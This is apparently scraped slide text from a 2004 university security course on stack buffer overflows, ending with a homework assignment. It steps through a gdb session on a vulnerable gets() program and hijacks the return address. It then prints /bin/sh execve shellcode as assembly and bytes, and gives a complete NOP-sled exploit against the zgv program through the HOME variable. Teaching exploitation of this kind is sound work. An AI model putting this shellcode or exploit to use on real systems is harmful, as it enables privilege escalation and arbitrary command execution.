1 #include void silly(){ char s[30]; gets(s); printf("%s\n",s); } main(){ silly(); return 0; }

$: 1 #include void silly(){ char s[30]; gets(s); printf("%s\n",s); } main(){ silly(); return 0; }$
1

#include <stdio.h>

void silly(){char s[30];gets(s);printf("%s\n",s);

}main(){silly();return 0;

}

2

3

• gcc -ggdb b.c– This creates a.out

• gdb a.outGNU gdb Red Hat Linux (5.2.1-4)

Copyright 2002 Free Software Foundation, Inc.

4

(GDB) disas main

Dump of assembler code for function main:

0x8048388 <main>: push %ebp

0x8048389 <main+1>: mov %esp,%ebp

0x804838b <main+3>: sub $0x8,%esp

0x804838e <main+6>: and $0xfffffff0,%esp

0x8048391 <main+9>: mov $0x0,%eax

0x8048396 <main+14>: sub %eax,%esp

0x8048398 <main+16>: call 0x804835c <silly>

0x804839d <main+21>: mov $0x0,%eax

0x80483a2 <main+26>: leave

0x80483a3 <main+27>: ret

End of assembler dump.

5

(gdb) disas silly

Dump of assembler code for function silly:

0x804835c <silly>: push %ebp

0x804835d <silly+1>: mov %esp,%ebp

0x804835f <silly+3>: sub $0x28,%esp

0x8048362 <silly+6>: sub $0xc,%esp

0x8048365 <silly+9>: lea 0xffffffd8(%ebp),%eax

0x8048368 <silly+12>: push %eax

0x8048369 <silly+13>: call 0x804827c <gets>

6

0x804836e <silly+18>: add $0x10,%esp

0x8048371 <silly+21>: sub $0x8,%esp

0x8048374 <silly+24>: lea 0xffffffd8(%ebp),%eax

0x8048377 <silly+27>: push %eax

0x8048378 <silly+28>: push $0x8048404

0x804837d <silly+33>: call 0x804829c <printf>

0x8048382 <silly+38>: add $0x10,%esp

0x8048385 <silly+41>: leave

0x8048386 <silly+42>: ret


7

$ gdb a.outGNU gdb Red Hat Linux (5.2.1-4)[...](gdb) runStarting program: /home/sherif/c/bo/a.out

AAAAAAAAAAAAAAAAAAAA

Program exited normally.

8

(gdb) run

Starting program: /home/sherif/c/bo/a.out

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Program received signal SIGTRAP, Trace/breakpoint trap.

0x421341e9 in environ () from /lib/i686/libc.so.6

9

Starting program: /home/sherif/c/bo/a.outAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.0x41414141 in ?? ()(gdb) info registerseax 0x7b 123ecx 0x42134d80 1108561280edx 0x7b 123ebx 0x4213820c 1108574732esp 0xbffff370 0xbffff370

ebp 0x41414141 0x41414141esi 0x40013020 1073819680edi 0x421341e8 1108558312eip 0x41414141 0x41414141eflags 0x10282 66178

10

#include <stdio.h>void notcalled(){puts("no one called me!\n");

}void silly(){char s[30];gets(s);printf("%s\n",s);

}main(){silly();return 0;

}

11

(gdb) disas notcalled

Dump of assembler code for function notcalled:

0x804838c <notcalled>: push %ebp

0x804838d <notcalled+1>: mov %esp,%ebp

0x804838f <notcalled+3>: sub $0x8,%esp

0x8048392 <notcalled+6>: sub $0xc,%esp

0x8048395 <notcalled+9>: push $0x804844c

0x804839a <notcalled+14>: call 0x80482ac <puts>

0x804839f <notcalled+19>: add $0x10,%esp

0x80483a2 <notcalled+22>: leave

0x80483a3 <notcalled+23>: ret


12

(gdb) run

Starting program: /home/sherif/c/bo/a.out

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAABCDEFGHIJKLMNOPQRSTUVWXYZ

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAABCDEFGHIJKLMNOPQRSTUVWXYZ

Program received signal SIGSEGV, Segmentation fault.

0x53525150 in ?? ()

(gdb) info register

13

eax 0x38 56

ecx 0x42134d80 1108561280

edx 0x38 56

ebx 0x4213820c 1108574732

esp 0xbffff880 0xbffff880

ebp 0x4f4e4d4c 0x4f4e4d4c

esi 0x40013020 1073819680

edi 0x421341e8 1108558312

eip 0x53525150 0x53525150

[...]

14

15

main(){

printf("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAABCDEFGHIJKLMNO%c%c%c%cTUVWXYZ\n",

0x8c, 0x83, 0x04, 0x08);

}

16

[sherif@rnd bo]$ ./b2

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAABCDEFGHIJKLMNTUVWXYZ

[sherif@rnd bo]$ ./b2 | ./a.out

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAABCDEFGHIJKLMNTUVWXYZ

no one called me!

Segmentation fault

17

Dump of assembler code for function execve:0xb09d0 <execve>: push %ebp0xb09d1 <execve+1>: mov %esp,%ebp0xb09d3 <execve+3>: sub $0x18,%esp0xb09d6 <execve+6>: mov %ebx,0xfffffff4(%ebp)0xb09d9 <execve+9>: call 0x1579d0xb09de <execve+14>: add $0x8984e,%ebx0xb09e4 <execve+20>: mov %edi,0xfffffffc(%ebp)0xb09e7 <execve+23>: mov 0x1b8(%ebx),%eax0xb09ed <execve+29>: mov 0x8(%ebp),%edi0xb09f0 <execve+32>: mov %esi,0xfffffff8(%ebp)0xb09f3 <execve+35>: test %eax,%eax0xb09f5 <execve+37>: jne 0xb0a30 <execve+96>0xb09f7 <execve+39>: mov 0xc(%ebp),%ecx0xb09fa <execve+42>: mov 0x10(%ebp),%edx0xb09fd <execve+45>: push %ebx0xb09fe <execve+46>: mov %edi,%ebx0xb0a00 <execve+48>: mov $0xb,%eax0xb0a05 <execve+53>: int $0x80

18

.global code_start

.global code_end

.datacode_start: jmp my_st_ptmy_call: popl %esi movl %esi,0x8(%esi) xor %eax,%eax /* put 0 in %eax */ movb %eax,0x7(%esi) /* put terminating 0*/ movl %eax,0xc(%esi) /* another 0 to */my_execve: movb $0xb,%al /* execve( */ movl %esi,%ebx /* "/bin/sh", lea 0x8(%esi),%ecx /* & of "/bin/sh" xor %edx,%edx /* NULL )*/ int $0x80 /* */my_st_pt: call my_call.string "/bin/shX"code_end:

19

extern void code_start();

extern void code_end();

#include <stdio.h>

main() {

((void (*)(void)) code_start)();

}

20

extern void code_start();

extern void code_end();

#include <stdio.h>

main() {

char *p = (char*) code_start;

printf("char code[]={");

while(*p){

printf("0x%x, ", (unsigned char)*p++);

}

printf("};");

}

21

char code[]={0xeb, 0x17, 0x5e, 0x89, 0x76, 0x8, 0x31, 0xc0, 0x88, 0x46, 0x7, 0x89, 0x46, 0xc, 0xb0, 0xb, 0x89, 0xf3, 0x8d, 0x4e, 0x8, 0x31, 0xd2, 0xcd, 0x80, 0xe8, 0xe4, 0xff, 0xff, 0xff, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x58, 0x00 };

22

char code[]={0xeb, 0x17, 0x5e, 0x89, 0x76, 0x8, 0x31, 0xc0, 0x88, 0x46, 0x7, 0x89, 0x46, 0xc, 0xb0, 0xb, 0x89, 0xf3, 0x8d, 0x4e, 0x8, 0x31, 0xd2, 0xcd, 0x80, 0xe8, 0xe4, 0xff, 0xff, 0xff, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x58, 0x00 };

main(){

((void (*)(void)) code)();

}

23

24

#include <stdio.h>

main(){ char *params[]={"/bin/ls", "/", NULL}; char *env[]={"TERM=dumb", NULL};

execve("/bin/ls", params, env);}

25

.global code_start

.global code_end

.datacode_start: jmp my_st_ptmy_call: popl %esi movl %esi,0x8(%esi) xor %eax,%eax /* put 0 in %eax */ movb %eax,0x7(%esi) /* put terminating 0*/ movl %eax,0xc(%esi) /* another 0 to */my_execve: movb $0xb,%al /* execve( */ movl %esi,%ebx /* "/bin/sh", lea 0x8(%esi),%ecx /* & of "/bin/sh" xor %edx,%edx /* NULL )*/ int $0x80 /* */my_st_pt: call my_call.string "/bin/shX"code_end:

26

#include <stdio.h>

#include <unistd.h>

#include <stdlib.h>

/* This is the minimal shellcode from the tutorial */

static char shellcode[]=

"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";

#define NOP 0x90

#define LEN 1032

#define RET 0xbffff574

27

int main(){

char buffer[LEN]; long retaddr = RET; int i;

fprintf(stderr,"using address 0x%lx\n",retaddr);

for (i=0;i<LEN;i+=4)

*(long *)&buffer[i] = retaddr;

for (i=0;i<(LEN-strlen(shellcode)-100);i++)

*(buffer+i) = NOP;

memcpy(buffer+i,shellcode,strlen(shellcode));

setenv("HOME", buffer, 1);

execlp("zgv","zgv",NULL);

return 0;

}

28

CSCI 485 04: Security Engineering Spring 2004

Assignment 3: Due Tuesday, March 16th, 2004

A colleague has proposed the following program as a simple means of copying the first command-line argument to a local variable. You are asked to demonstrate that is an insecure program by showing that it may allow for the execution of an arbitrary command.

#include <stdio.h>#include <strings.h>

main(int argc, char** argv){char s[1000];strcpy(s, argv[1]);puts(s);

}

1 #include void silly(){ char s[30]; gets(s); printf("%s\n",s); } main(){ silly(); return 0; }

Documents

Transcript of 1 #include void silly(){ char s[30]; gets(s); printf("%s\n",s); } main(){ silly(); return 0; }